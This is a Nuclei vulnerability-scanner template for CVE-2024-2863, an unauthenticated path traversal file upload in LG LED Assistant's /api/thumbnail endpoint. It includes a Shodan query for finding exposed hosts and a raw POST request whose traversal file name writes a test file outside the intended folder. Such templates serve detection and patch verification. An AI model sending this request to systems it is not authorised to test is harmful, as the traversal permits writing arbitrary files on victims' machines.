id: CVE-2024-2863 info: name: LG LED Assistant - Thumbnail Path Traversal File Upload author: beginee severity: high description: | A path traversal vulnerability exists in the endpoint handler for /api/thumbnail in Common.js. An unauthenticated remote attacker can exploit this to upload arbitrary files to any location on the disk drive where the product is installed. reference: - https://www.tenable.com/security/research/tra-2024-08 - https://nvd.nist.gov/vuln/detail/CVE-2024-2863 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-2863 cwe-id: CWE-22 epss-score: 0.56126 epss-percentile: 0.98154 metadata: verified: true max-request: 1 shodan-query: 'http.title:"LG LED Assistant" OR http.title:"LED Assistant"' tags: cve,cve2024,lg,lfi,file-upload,thumbnail,traversal,vkev variables: target_filename: "/../../../../../../Users/Public/poc_test.txt" target_fileStr: "bWFsaWNpb3VzIGNvbnRlbnQ%3d" http: - raw: - | POST /api/thumbnail HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded fileName={{target_filename}}&fileStr={{target_fileStr}} matchers: - type: dsl dsl: - 'contains(body, "{\"resCode\":\"SUCCESS\"}")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100ae6224629f540e3b85ea20e964a1279b7d596d60b8a8ad870617b0b3f36c829602210097d8e512770403c27f23b95c052aee1cdc881339b49010a61b24db1219bec051:922c64590222798bb761d5b6d8e72950